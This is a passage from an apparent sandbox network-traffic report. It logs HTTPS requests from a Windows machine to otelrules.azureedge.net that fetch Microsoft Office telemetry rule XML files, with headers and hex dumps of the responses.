                                                                    2024-10-28 13:03:39 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    134192.168.2.44988913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:39 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:39 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1403
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                    ETag: "0x8DC582BDCDD6400"
                                                                    x-ms-request-id: 41af9018-001e-0046-0956-26da4b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130339Z-17c5cb586f6wnfhvhw6gvetfh400000004m0000000000exu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:39 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    135192.168.2.44989013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:39 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:39 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1366
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                    ETag: "0x8DC582BDF1E2608"
                                                                    x-ms-request-id: 141f8a5a-601e-000d-3b74-272618000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130339Z-16849878b78wv88bk51myq5vxc00000005d0000000005eew
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:39 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    136192.168.2.44989113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:39 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:40 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1399
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                    ETag: "0x8DC582BE8C605FF"
                                                                    x-ms-request-id: c3d8694b-101e-0046-45a3-2691b0000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-16849878b785dznd7xpawq9gcn00000006a000000000m0aa
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    137192.168.2.44989213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:40 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1362
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                    ETag: "0x8DC582BDF497570"
                                                                    x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-16849878b78km6fmmkbenhx76n00000004dg000000008v1e
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:40 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    138192.168.2.44989313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:40 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1403
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                    ETag: "0x8DC582BDC2EEE03"
                                                                    x-ms-request-id: 5a317ae7-601e-005c-1a25-26f06f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-15b8d89586fx2hlt035xdehq580000000nu00000000088yw
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:40 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    139192.168.2.44989413.107.246.604431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:40 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1366
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                    ETag: "0x8DC582BEA414B16"
                                                                    x-ms-request-id: 68df6217-401e-0029-6d9c-279b43000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-16849878b78j5kdg3dndgqw0vg00000006q000000000h079
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    140192.168.2.44989513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:40 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1399
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                    ETag: "0x8DC582BE1CC18CD"
                                                                    x-ms-request-id: 5383d0ca-b01e-0053-2a56-26cdf8000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-r197bdfb6b48pl4k4a912hk2g4000000047g0000000060k9
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    141192.168.2.44989613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:41 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:40 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1362
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                    ETag: "0x8DC582BEB256F43"
                                                                    x-ms-request-id: 23a04ebb-601e-003d-38e0-286f25000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130340Z-15b8d89586fhl2qtatrz3vfkf00000000b0000000000817e
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    142192.168.2.44989713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:40 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:41 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:41 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1403
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                    ETag: "0x8DC582BEB866CDB"
                                                                    x-ms-request-id: 60449bdf-301e-005d-500b-26e448000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130341Z-16849878b78qg9mlz11wgn0wcc00000004m000000000eka7
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:41 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    143192.168.2.44989813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:41 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:41 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:41 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1366
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                    ETag: "0x8DC582BE5B7B174"
                                                                    x-ms-request-id: 5437d72c-801e-002a-238c-2731dc000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130341Z-17c5cb586f6fqqst87nqkbsx1c00000003m00000000000h6
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
